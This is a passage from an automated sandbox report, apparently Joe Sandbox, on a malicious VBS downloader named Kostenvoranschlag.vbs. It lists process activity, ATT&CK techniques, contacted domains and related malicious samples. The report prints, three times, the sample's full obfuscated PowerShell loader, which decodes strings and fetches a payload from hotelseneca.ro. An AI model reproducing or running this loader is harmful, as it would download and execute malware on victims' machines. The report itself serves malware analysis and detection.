              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#texguino trave gastnderens oppustes #>;$nrtagenhedens='forgrenedes';<#samlemappens slenderization forepale kiloers bulmeurters #>;$skuldrings11=$varies+$host.ui; function blaaklokkers($kmnings246){if ($skuldrings11) {$koalabjrn++;}$afvundnes=$maleficium+$kmnings246.'length'-$koalabjrn; for( $katina=4;$katina -lt $afvundnes;$katina+=5){$tachytelic=$katina;$presartorial+=$kmnings246[$katina];$harpalides='glaeder';}$presartorial;}function fritidsklubberne($fjernsynsapparat){ . ($festsale) ($fjernsynsapparat);}$mellemstykket=blaaklokkers 'c mpmunaborunbz.awaicomplazuml raaawall/amal ';$arkipelagers='de d[ uncnp ededaabtun.e.fjl.snoncemiljr intv pinie.tocsyllesyntpnervolyriiafsynoddet .olmk meafavnnfra,a runghabie knorarga]ingo:kr g:allesw.ipebemacskftubl,arskovi centunlay estpobserarilomussttrypopaucclageotyp,lkerm mist= hy, ';$mellemstykket+=blaaklokkers 'kors5camb.p ls0ande paat( igiwrigsisjusn insdpolyo enrwmeloscykl endnovert nd gaar1over0atro.mine0unpr;cha ,ikkw andikancnrnne6ro,e4re r; k g pr,xheim6pawl4feti; ora g ourcatavuneq:peri1 sem3adve1 pup.m,na0aabe) kli ovegprd ewoolcsuppk preouni./afma2bane0 fej1 ea0skin0preo1,ros0damp1sand ha fflavi sndr ague disfgorgoabstx g n/mari1 ave3 .al1frem.gyna0bes, ';$arkipelagers+='hold[stanngrouea sntabey.prots prseoprec inmu twyrkretienertt anyrewrp sedrsleeoaylitgadeoprotcbaadoveneldepotttely.ittpinteetoma] sla ';$furthy=blaaklokkers 'inteu in ss edelunerm un-remiasprigaikiecontn o et rbe ';$opvejningerne=blaaklokkers ' ureh fsotballtstabpstyls ati:shet/anno/,efowbejlw subwfede.epishha dost,nt outekloalouabs ecie,usknbiseebefrcindkavarm. xplr ai,ofasc/ mulpav nefamirlyknsreprpstriesnorcansatsnkeivituv besiunu.s eclthapu.ribbswienn ybgpuni ';$vellumy=blaaklokkers 'pseu>adre ';$festsale=blaaklokkers 'tingil rremedix,toc ';$kua='unfanged';$arkipelagers+='thor:unde:kdkrtpalolrecosenhe1s bs2 hom ';$befjelsernes='\commandoes.gre';fritidsklubberne (blaaklokkers 'grav$du,egtripl ndhoclosbtredare alsuff:dassbjugua .ekloutla medr ,udaeli okonk=vrne$wageeburfnpr.tvspri:f rsashivpfi vpensodfi,aadermtothearega+ngle$,dspbgange ny f iltjgrenereprl ch s fe ed varknocnregnel bis irr ');fritidsklubberne (blaaklokkers ' ci.$ torgselvlb ddofilob indakjrul ko.:sucus ,raaov,rllsenmkonceaitkdudskidoubg alt ermnbamlimruwn fu gforme elr.trasvrte=rntg$shepofe tpilliv ubeeparajunden atoi offnabj gdespe ladrmononmisseall . .ersfllepkanolr ali,almtkitt(nonb$bughv ine fr,l inylcageuur smvi.jys nf)regn ');fritidsklubberne (blaaklokkers $arkipelagers);$opvejningerne=$salmedigtningers[0];$autostandardization=(blaaklokkers 'moda$bobfgmuslll vio omabawarates l for: .eistvinncommd blae my rpoemlun aekmpem pransndeilokanst egtrk,est irda enhundeba f=unhenraaseteedwun e-adepo,edtb luejsem.esuppcskrmtstil bess phoyclins sint c.iea epm lyk. pernhar e ksit a t. dewjgereimbublivicpalelamini stvebl gnunaptta.j
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#texguino trave gastnderens oppustes #>;$nrtagenhedens='forgrenedes';<#samlemappens slenderization forepale kiloers bulmeurters #>;$skuldrings11=$varies+$host.ui; function blaaklokkers($kmnings246){if ($skuldrings11) {$koalabjrn++;}$afvundnes=$maleficium+$kmnings246.'length'-$koalabjrn; for( $katina=4;$katina -lt $afvundnes;$katina+=5){$tachytelic=$katina;$presartorial+=$kmnings246[$katina];$harpalides='glaeder';}$presartorial;}function fritidsklubberne($fjernsynsapparat){ . ($festsale) ($fjernsynsapparat);}$mellemstykket=blaaklokkers 'c mpmunaborunbz.awaicomplazuml raaawall/amal ';$arkipelagers='de d[ uncnp ededaabtun.e.fjl.snoncemiljr intv pinie.tocsyllesyntpnervolyriiafsynoddet .olmk meafavnnfra,a runghabie knorarga]ingo:kr g:allesw.ipebemacskftubl,arskovi centunlay estpobserarilomussttrypopaucclageotyp,lkerm mist= hy, ';$mellemstykket+=blaaklokkers 'kors5camb.p ls0ande paat( igiwrigsisjusn insdpolyo enrwmeloscykl endnovert nd gaar1over0atro.mine0unpr;cha ,ikkw andikancnrnne6ro,e4re r; k g pr,xheim6pawl4feti; ora g ourcatavuneq:peri1 sem3adve1 pup.m,na0aabe) kli ovegprd ewoolcsuppk preouni./afma2bane0 fej1 ea0skin0preo1,ros0damp1sand ha fflavi sndr ague disfgorgoabstx g n/mari1 ave3 .al1frem.gyna0bes, ';$arkipelagers+='hold[stanngrouea sntabey.prots prseoprec inmu twyrkretienertt anyrewrp sedrsleeoaylitgadeoprotcbaadoveneldepotttely.ittpinteetoma] sla ';$furthy=blaaklokkers 'inteu in ss edelunerm un-remiasprigaikiecontn o et rbe ';$opvejningerne=blaaklokkers ' ureh fsotballtstabpstyls ati:shet/anno/,efowbejlw subwfede.epishha dost,nt outekloalouabs ecie,usknbiseebefrcindkavarm. xplr ai,ofasc/ mulpav nefamirlyknsreprpstriesnorcansatsnkeivituv besiunu.s eclthapu.ribbswienn ybgpuni ';$vellumy=blaaklokkers 'pseu>adre ';$festsale=blaaklokkers 'tingil rremedix,toc ';$kua='unfanged';$arkipelagers+='thor:unde:kdkrtpalolrecosenhe1s bs2 hom ';$befjelsernes='\commandoes.gre';fritidsklubberne (blaaklokkers 'grav$du,egtripl ndhoclosbtredare alsuff:dassbjugua .ekloutla medr ,udaeli okonk=vrne$wageeburfnpr.tvspri:f rsashivpfi vpensodfi,aadermtothearega+ngle$,dspbgange ny f iltjgrenereprl ch s fe ed varknocnregnel bis irr ');fritidsklubberne (blaaklokkers ' ci.$ torgselvlb ddofilob indakjrul ko.:sucus ,raaov,rllsenmkonceaitkdudskidoubg alt ermnbamlimruwn fu gforme elr.trasvrte=rntg$shepofe tpilliv ubeeparajunden atoi offnabj gdespe ladrmononmisseall . .ersfllepkanolr ali,almtkitt(nonb$bughv ine fr,l inylcageuur smvi.jys nf)regn ');fritidsklubberne (blaaklokkers $arkipelagers);$opvejningerne=$salmedigtningers[0];$autostandardization=(blaaklokkers 'moda$bobfgmuslll vio omabawarates l for: .eistvinncommd blae my rpoemlun aekmpem pransndeilokanst egtrk,est irda enhundeba f=unhenraaseteedwun e-adepo,edtb luejsem.esuppcskrmtstil bess phoyclins sint c.iea epm lyk. pernhar e ksit a t. dewjgereimbublivicpalelamini stvebl gnunaptta.j
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#texguino trave gastnderens oppustes #>;$nrtagenhedens='forgrenedes';<#samlemappens slenderization forepale kiloers bulmeurters #>;$skuldrings11=$varies+$host.ui; function blaaklokkers($kmnings246){if ($skuldrings11) {$koalabjrn++;}$afvundnes=$maleficium+$kmnings246.'length'-$koalabjrn; for( $katina=4;$katina -lt $afvundnes;$katina+=5){$tachytelic=$katina;$presartorial+=$kmnings246[$katina];$harpalides='glaeder';}$presartorial;}function fritidsklubberne($fjernsynsapparat){ . ($festsale) ($fjernsynsapparat);}$mellemstykket=blaaklokkers 'c mpmunaborunbz.awaicomplazuml raaawall/amal ';$arkipelagers='de d[ uncnp ededaabtun.e.fjl.snoncemiljr intv pinie.tocsyllesyntpnervolyriiafsynoddet .olmk meafavnnfra,a runghabie knorarga]ingo:kr g:allesw.ipebemacskftubl,arskovi centunlay estpobserarilomussttrypopaucclageotyp,lkerm mist= hy, ';$mellemstykket+=blaaklokkers 'kors5camb.p ls0ande paat( igiwrigsisjusn insdpolyo enrwmeloscykl endnovert nd gaar1over0atro.mine0unpr;cha ,ikkw andikancnrnne6ro,e4re r; k g pr,xheim6pawl4feti; ora g ourcatavuneq:peri1 sem3adve1 pup.m,na0aabe) kli ovegprd ewoolcsuppk preouni./afma2bane0 fej1 ea0skin0preo1,ros0damp1sand ha fflavi sndr ague disfgorgoabstx g n/mari1 ave3 .al1frem.gyna0bes, ';$arkipelagers+='hold[stanngrouea sntabey.prots prseoprec inmu twyrkretienertt anyrewrp sedrsleeoaylitgadeoprotcbaadoveneldepotttely.ittpinteetoma] sla ';$furthy=blaaklokkers 'inteu in ss edelunerm un-remiasprigaikiecontn o et rbe ';$opvejningerne=blaaklokkers ' ureh fsotballtstabpstyls ati:shet/anno/,efowbejlw subwfede.epishha dost,nt outekloalouabs ecie,usknbiseebefrcindkavarm. xplr ai,ofasc/ mulpav nefamirlyknsreprpstriesnorcansatsnkeivituv besiunu.s eclthapu.ribbswienn ybgpuni ';$vellumy=blaaklokkers 'pseu>adre ';$festsale=blaaklokkers 'tingil rremedix,toc ';$kua='unfanged';$arkipelagers+='thor:unde:kdkrtpalolrecosenhe1s bs2 hom ';$befjelsernes='\commandoes.gre';fritidsklubberne (blaaklokkers 'grav$du,egtripl ndhoclosbtredare alsuff:dassbjugua .ekloutla medr ,udaeli okonk=vrne$wageeburfnpr.tvspri:f rsashivpfi vpensodfi,aadermtothearega+ngle$,dspbgange ny f iltjgrenereprl ch s fe ed varknocnregnel bis irr ');fritidsklubberne (blaaklokkers ' ci.$ torgselvlb ddofilob indakjrul ko.:sucus ,raaov,rllsenmkonceaitkdudskidoubg alt ermnbamlimruwn fu gforme elr.trasvrte=rntg$shepofe tpilliv ubeeparajunden atoi offnabj gdespe ladrmononmisseall . .ersfllepkanolr ali,almtkitt(nonb$bughv ine fr,l inylcageuur smvi.jys nf)regn ');fritidsklubberne (blaaklokkers $arkipelagers);$opvejningerne=$salmedigtningers[0];$autostandardization=(blaaklokkers 'moda$bobfgmuslll vio omabawarates l for: .eistvinncommd blae my rpoemlun aekmpem pransndeilokanst egtrk,est irda enhundeba f=unhenraaseteedwun e-adepo,edtb luejsem.esuppcskrmtstil bess phoyclins sint c.iea epm lyk. pernhar e ksit a t. dewjgereimbublivicpalelamini stvebl gnunaptta.j Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		221
              Scripting              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              System Network Configuration Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Kostenvoranschlag.vbs8%ReversingLabsScript-WScript.Packed.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              hotelseneca.ro
              		185.181.240.15
              		truefalse
                		unknown
                Horm5zl_6637.6637.6637.657e
                		unknown
                		unknowntrue
                  		unknown
                  www.hotelseneca.ro
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://www.hotelseneca.ro/Perspectivist.snpfalse
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://hotelseneca.ropowershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.hotelseneca.ropowershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://go.micropowershell.exe, 00000004.00000002.1391887473.000001676463C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.hotelseneca.ro/Perspectivist.snpPpowershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://contoso.com/powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.hotelseneca.ro/Perspectivist.snpXRpowershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.micro#powershell.exe, 0000000D.00000002.2569380323.0000000007444000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.hotelseneca.ro/Perspectivist.snpmuimpowershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://crl.microsoftPpowershell.exe, 0000000D.00000002.2569380323.00000000073D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.hotelseneca.ropowershell.exe, 00000004.00000002.1391887473.00000167658E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          185.181.240.15
                                          		hotelseneca.roRomania
                                          		5588GTSCEGTSCentralEuropeAntelGermanyCZfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1541205
                                          Start date and time:2024-10-24 15:19:07 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 12s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:20
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Kostenvoranschlag.vbs
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winVBS@9/7@2/1
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 88%
                                          • Number of executed functions: 55
                                          • Number of non-executed functions: 22
                                          Cookbook Comments:
                                          • Found application associated with file extension: .vbs

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 7400 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 8108 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: Kostenvoranschlag.vbs

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          09:20:04API Interceptor73x Sleep call for process: powershell.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          No context

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          GTSCEGTSCentralEuropeAntelGermanyCZSzacunek IMP29575 za eksport z ostatniego kwartalu.vbsGet hashmaliciousGuLoaderBrowse
                                          • 188.241.183.203
                                          atH4SE3Oi6.elfGet hashmaliciousMiraiBrowse
                                          • 94.42.225.27
                                          o2YUBeMZW6.elfGet hashmaliciousMiraiBrowse
                                          • 62.168.37.157
                                          5tSAlF2WkT.elfGet hashmaliciousMiraiBrowse
                                          • 62.168.37.162
                                          ai3eCONS9Q.elfGet hashmaliciousMiraiBrowse
                                          • 94.42.250.26
                                          arm4.elfGet hashmaliciousMiraiBrowse
                                          • 157.25.81.90
                                          byte.arm5.elfGet hashmaliciousOkiruBrowse
                                          • 212.38.198.222
                                          O1CZjzItH1.vbsGet hashmaliciousGuLoaderBrowse
                                          • 31.14.12.249
                                          Stima IMP87654 per l'esportazione dell'ultimo trimestre.vbsGet hashmaliciousGuLoaderBrowse
                                          • 188.241.183.45
                                          la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                          • 193.85.134.61

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0eSzacunek IMP29575 za eksport z ostatniego kwartalu.vbsGet hashmaliciousGuLoaderBrowse
                                          • 185.181.240.15
                                          kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                          • 185.181.240.15
                                          PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                          • 185.181.240.15
                                          https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/Get hashmaliciousUnknownBrowse
                                          • 185.181.240.15
                                          Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 185.181.240.15
                                          xVmySfWfcW.exeGet hashmaliciousUnknownBrowse
                                          • 185.181.240.15
                                          226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 185.181.240.15
                                          LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                          • 185.181.240.15
                                          Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                                          • 185.181.240.15
                                          xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                                          • 185.181.240.15

                                          Dropped Files

                                          No context

